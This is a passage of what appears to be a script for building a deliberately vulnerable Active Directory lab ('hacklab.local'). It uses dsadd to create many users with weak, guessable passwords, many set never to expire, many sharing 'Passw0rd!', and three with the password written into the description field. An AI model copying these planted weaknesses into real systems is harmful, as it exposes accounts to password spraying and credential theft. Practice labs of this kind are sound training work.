169 | dsadd user "cn=m.anderson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Bigdog1 -mustchpwd no -pwdneverexpires yes
170 | dsadd user "cn=n.johnsson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Guitar1 -mustchpwd no -pwdneverexpires yes
171 | dsadd user "cn=o.martiwnez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Jackson1 -mustchpwd no -pwdneverexpires yes
172 | dsadd user "cn=p.hernandez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Whatever1 -mustchpwd no -pwdneverexpires yes
173 | dsadd user "cn=q.wiloson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Mickey1 -mustchpwd no -pwdneverexpires yes
174 | dsadd user "cn=r.davirws, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Chicken1 -mustchpwd no -pwdneverexpires yes
175 | dsadd user "cn=s.moewore, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Sparky1 -mustchpwd no -pwdneverexpires yes
176 | dsadd user "cn=t.thoweermas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Snoopy1 -mustchpwd no -pwdneverexpires yes
177 | dsadd user "cn=u.johnslon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Maverick1 -mustchpwd no -pwdneverexpires yes
178 | dsadd user "cn=v.martienez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Phoenix1 -mustchpwd no -pwdneverexpires yes
179 | dsadd user "cn=w.rodrisguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Camaro1 -mustchpwd no -pwdneverexpires yes
180 | dsadd user "cn=x.sanchgez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Peanut1 -mustchpwd no -pwdneverexpires yes
181 | dsadd user "cn=y.wilison, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Morgan1 -mustchpwd no -pwdneverexpires yes -desc "Changed the users password to Morgan1"
182 | dsadd user "cn=z.davsdis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Welcome1 -mustchpwd no -pwdneverexpires yes
183 | dsadd user "cn=a.clark, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Falcon1 -mustchpwd no -pwdneverexpires yes
184 | dsadd user "cn=b.johndson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Cowboy1 -mustchpwd no -pwdneverexpires yes
185 | dsadd user "cn=c.martiwnez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Ferrari1 -mustchpwd no -pwdneverexpires yes
186 | dsadd user "cn=d.rodrigruez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Samsung1 -mustchpwd no -pwdneverexpires yes
187 | dsadd user "cn=e.sanchjez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Andrea1 -mustchpwd no -pwdneverexpires yes
188 | dsadd user "cn=f.wilyson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Smokey1 -mustchpwd no -pwdneverexpires yes
189 | dsadd user "cn=g.davioos, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Steelers1 -mustchpwd no -pwdneverexpires yes
190 | dsadd user "cn=h.mooeere, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Joseph1 -mustchpwd no -pwdneverexpires yes
191 | dsadd user "cn=i.thomas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Mercedes1 -mustchpwd no -pwdneverexpires yes
192 | dsadd user "cn=j.johnhson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Dakota1 -mustchpwd no -pwdneverexpires yes
193 | dsadd user "cn=k.martiunez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Arsenal1 -mustchpwd no -pwdneverexpires yes
194 | dsadd user "cn=l.rodrigiuez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Eagles1 -mustchpwd no -pwdneverexpires yes
195 | dsadd user "cn=m.sanychez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Melissa1 -mustchpwd no -pwdneverexpires yes
196 | dsadd user "cn=n.wiwlson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Boomer1 -mustchpwd no -pwdneverexpires yes
197 | dsadd user "cn=o.daviuus, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Booboo1 -mustchpwd no -pwdneverexpires yes
198 | dsadd user "cn=p.moorrre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Spider1 -mustchpwd no -pwdneverexpires yes
199 | dsadd user "cn=q.thdddomas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Nascar1 -mustchpwd no -pwdneverexpires yes
200 | dsadd user "cn=r.johntson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Tigers1 -mustchpwd no -pwdneverexpires yes
201 | dsadd user "cn=s.marttinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Yellow1 -mustchpwd no -pwdneverexpires yes -desc "Changed the users password to Yellow1"
202 | dsadd user "cn=t.rodrieguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Gateway1 -mustchpwd no -pwdneverexpires yes
203 | dsadd user "cn=u.sancrhez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Marina1 -mustchpwd no -pwdneverexpires yes
204 | dsadd user "cn=v.wilsion, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Diablo1 -mustchpwd no -pwdneverexpires yes
205 | dsadd user "cn=w.davccis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Bulldog1 -mustchpwd no -pwdneverexpires yes
206 | dsadd user "cn=x.moowsxre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Qwer12341 -mustchpwd no -pwdneverexpires yes
207 | dsadd user "cn=y.thomeeeas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Compaq1 -mustchpwd no -pwdneverexpires yes
208 | dsadd user "cn=z.johnqson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Purple1 -mustchpwd no -pwdneverexpires yes
209 | dsadd user "cn=a.martwinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Hardcore1 -mustchpwd no -pwdneverexpires yes
210 | dsadd user "cn=b.rodrigutuez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Banana1 -mustchpwd no -pwdneverexpires yes
211 | dsadd user "cn=c.sanczhez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Junior1 -mustchpwd no -pwdneverexpires yes
212 | dsadd user "cn=d.wilsuion, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Hannah1 -mustchpwd no -pwdneverexpires yes
213 | dsadd user "cn=e.daerfvis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Porsche1 -mustchpwd no -pwdneverexpires yes
214 | dsadd user "cn=f.mooure, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Lakers1 -mustchpwd no -pwdneverexpires yes
215 | dsadd user "cn=g.thomeeeas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Iceman1 -mustchpwd no -pwdneverexpires yes
216 | dsadd user "cn=h.johnsson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Cowboys1 -mustchpwd no -pwdneverexpires yes
217 | dsadd user "cn=i.martinwez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd London1 -mustchpwd no -pwdneverexpires yes
218 | dsadd user "cn=j.rodrwyiguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Tennis1 -mustchpwd no -pwdneverexpires yes
219 | dsadd user "cn=k.sanchiez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Ncc17011 -mustchpwd no -pwdneverexpires yes
220 | dsadd user "cn=l.wilyson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Coffee1 -mustchpwd no -pwdneverexpires yes
221 | dsadd user "cn=m.davssis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Scooby1 -mustchpwd no -pwdneverexpires yes
222 | dsadd user "cn=n.moorcre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Miller1 -mustchpwd no -pwdneverexpires yes
223 | dsadd user "cn=o.thomderas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Boston1 -mustchpwd no -pwdneverexpires yes
224 | dsadd user "cn=p.johnsson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Q1w2e3r41 -mustchpwd no -pwdneverexpires yes
225 | dsadd user "cn=q.maratinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Fuckoff1 -mustchpwd no -pwdneverexpires yes
226 | dsadd user "cn=r.rodrieyguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Brandon1 -mustchpwd no -pwdneverexpires yes
227 | dsadd user "cn=s.sancyhez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Yamaha1 -mustchpwd no -pwdneverexpires yes
228 | dsadd user "cn=t.wilseon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Chester1 -mustchpwd no -pwdneverexpires yes
229 | dsadd user "cn=u.daytvis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Mother1 -mustchpwd no -pwdneverexpires yes
230 | dsadd user "cn=v.mocdore, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Forever1 -mustchpwd no -pwdneverexpires yes
231 | dsadd user "cn=w.thomattts, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Johnny1 -mustchpwd no -pwdneverexpires yes
232 | dsadd user "cn=x.johnsaon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Edward1 -mustchpwd no -pwdneverexpires yes
233 | dsadd user "cn=y.martihnez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Oliver1 -mustchpwd no -pwdneverexpires yes
234 | dsadd user "cn=z.rodrirtguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Redsox1 -mustchpwd no -pwdneverexpires yes
235 | dsadd user "cn=a.sanchtez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Player1 -mustchpwd no -pwdneverexpires yes
236 | dsadd user "cn=b.wilswon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Nikita1 -mustchpwd no -pwdneverexpires yes
237 | dsadd user "cn=c.davyis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Knight1 -mustchpwd no -pwdneverexpires yes
238 | dsadd user "cn=d.moodsre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Fender1 -mustchpwd no -pwdneverexpires yes
239 | dsadd user "cn=e.thomfffas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Midnight1 -mustchpwd no -pwdneverexpires yes
240 | dsadd user "cn=f.johnso, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Please1 -mustchpwd no -pwdneverexpires yes
241 | dsadd user "cn=g.martinjez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Brandy1 -mustchpwd no -pwdneverexpires yes
242 | dsadd user "cn=h.rodrigwuez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Badboy1 -mustchpwd no -pwdneverexpires yes
243 | dsadd user "cn=i.sancohez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Iwantu1 -mustchpwd no -pwdneverexpires yes
244 | dsadd user "cn=j.wilesosn, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Slayer1 -mustchpwd no -pwdneverexpires yes
245 | dsadd user "cn=k.dawerris, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Rangers1 -mustchpwd no -pwdneverexpires yes
246 | dsadd user "cn=l.moouiyre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Charles1 -mustchpwd no -pwdneverexpires yes
247 | dsadd user "cn=m.thogghmas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Flower1 -mustchpwd no -pwdneverexpires yes
248 | dsadd user "cn=n.johseeson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Bigdaddy1 -mustchpwd no -pwdneverexpires yes
249 | dsadd user "cn=o.martidnez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Wizard1 -mustchpwd no -pwdneverexpires yes
250 | dsadd user "cn=p.rodrasiguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Bigdick1 -mustchpwd no -pwdneverexpires yes
251 | dsadd user "cn=q.sanchpez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Jasper1 -mustchpwd no -pwdneverexpires yes
252 | dsadd user "cn=r.wilsson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Rachel1 -mustchpwd no -pwdneverexpires yes
253 | dsadd user "cn=s.daveeris, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Steven1 -mustchpwd no -pwdneverexpires yes
254 | dsadd user "cn=t.moodce, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Winner1 -mustchpwd no -pwdneverexpires yes
255 | dsadd user "cn=u.thomhhas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Adidas1 -mustchpwd no -pwdneverexpires yes -desc "Changed the users password to Adidas1"
256 | dsadd user "cn=v.jhnson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Victoria1 -mustchpwd no -pwdneverexpires yes
257 | dsadd user "cn=w.martfinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Natasha1 -mustchpwd no -pwdneverexpires yes
258 | dsadd user "cn=x.rodrifguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Jasmine1 -mustchpwd no -pwdneverexpires yes
259 | dsadd user "cn=y.sancuhez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Winter1 -mustchpwd no -pwdneverexpires yes
260 | dsadd user "cn=z.wilsaon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Prince1 -mustchpwd no -pwdneverexpires yes
261 | dsadd user "cn=a.davihhuus, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Panties1 -mustchpwd no -pwdneverexpires yes
262 | dsadd user "cn=b.mootfre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Marine1 -mustchpwd no -pwdneverexpires yes
263 | dsadd user "cn=c.thomhhsas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Ghbdtn1 -mustchpwd no -pwdneverexpires yes
264 | dsadd user "cn=d.johnsaon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Fishing1 -mustchpwd no -pwdneverexpires yes
265 | dsadd user "cn=e.martidfnez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Cocacola1 -mustchpwd no -pwdneverexpires yes
266 | dsadd user "cn=f.rodridfguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Casper1 -mustchpwd no -pwdneverexpires yes
267 | dsadd user "cn=g.sancthez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Raiders1 -mustchpwd no -pwdneverexpires yes
268 | dsadd user "cn=h.wilzson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Marlboro1 -mustchpwd no -pwdneverexpires yes
269 | dsadd user "cn=i.davffis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Gandalf1 -mustchpwd no -pwdneverexpires yes
270 | dsadd user "cn=j.moodckre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Asdfasdf1 -mustchpwd no -pwdneverexpires yes
271 | dsadd user "cn=k.thomeweas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Crystal1 -mustchpwd no -pwdneverexpires yes
272 | dsadd user "cn=l.johnon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
273 | dsadd user "cn=m.martiynez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Golden1 -mustchpwd no -pwdneverexpires yes
274 | dsadd user "cn=n.rodrsiguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Blowme1 -mustchpwd no -pwdneverexpires yes
275 | dsadd user "cn=o.sanrchez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Bigtits1 -mustchpwd no -pwdneverexpires yes
276 | dsadd user "cn=p.wiltson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Panther1 -mustchpwd no -pwdneverexpires yes
277 | dsadd user "cn=q.davfwfis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Lauren1 -mustchpwd no -pwdneverexpires yes
278 | dsadd user "cn=r.mooyre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Angela1 -mustchpwd no -pwdneverexpires yes
279 |
280 | # Head_Office / Administration
281 |
282 | dsadd user "cn=m.jenkins, ou=Administration, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
283 | dsadd user "cn=n.johnson, ou=Administration, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
284 | dsadd user "cn=o.jones, ou=Administration, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
285 | dsadd user "cn=g.white, ou=Administration, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
286 | dsadd user "cn=h.yalden, ou=Administration, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
287 | dsadd user "cn=i.yarbury, ou=Administration, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
288 | dsadd user "cn=j.yardley, ou=Administration, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
289 |
290 | # Head_Office / HR
291 |
292 | dsadd user "cn=z.mcdonald, ou=HR, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
293 | dsadd user "cn=a.murphy, ou=HR, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
294 | dsadd user "cn=b.natt, ou=HR, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
295 | dsadd user "cn=c.nelson, ou=HR, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
296 | dsadd user "cn=d.nightingale, ou=HR, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
297 | dsadd user "cn=e.nixon, ou=HR, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
298 | dsadd user "cn=f.nutter, ou=HR, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
299 |
300 | # Head_Office / Reception
301 |
302 | dsadd user "cn=p.kelly, ou=Reception, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
303 | dsadd user "cn=q.kennedy, ou=Reception, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
304 | dsadd user "cn=u.king, ou=Reception, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
305 | dsadd user "cn=r.knight, ou=Reception, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
306 | dsadd user "cn=s.lawrence, ou=Reception, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
307 | dsadd user "cn=t.lee, ou=Reception, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
308 |
309 | # Head_Office / Research
310 |
311 | dsadd user "cn=u.lewis, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
312 | dsadd user "cn=v.lloyd, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
313 | dsadd user "cn=w.marshall, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
314 | dsadd user "cn=x.martin, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
315 | dsadd user "cn=y.mason, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
316 | dsadd user "cn=g.dell, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
317 | dsadd user "cn=h.osborne, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
318 | dsadd user "cn=i.owen, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
319 | dsadd user "cn=j.oxley, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
320 | dsadd user "cn=k.page, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
321 | dsadd user "cn=l.painter, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
322 | dsadd user "cn=m.palmer, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
323 | dsadd user "cn=n.pastor, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
324 | dsadd user "cn=o.peterson, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
325 | dsadd user "cn=p.quill, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
326 | dsadd user "cn=q.quimby, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
327 | dsadd user "cn=u.quintrell, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
328 | dsadd user "cn=r.ramsey, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
329 | dsadd user "cn=s.ratliff, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
330 | dsadd user "cn=t.richards, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
331 | dsadd user "cn=u.roberts, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
332 | dsadd user "cn=v.robinson, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
333 | dsadd user "cn=w.scott, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
334 | dsadd user "cn=x.simpson, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
335 | dsadd user "cn=y.smith, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
336 | dsadd user "cn=z.stewart, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
337 | dsadd user "cn=a.taylor, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
338 | dsadd user "cn=b.turner, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
339 | dsadd user "cn=c.walsh, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
340 | dsadd user "cn=d.ward, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
341 | dsadd user "cn=e.webb, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
342 | dsadd user "cn=f.west, ou=Research, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
343 |
344 | # Head_Office / Sales
345 |
346 | dsadd user "cn=d.atkinson, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Summer123 -mustchpwd no
347 | dsadd user "cn=e.bailey, ou=Sales, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no
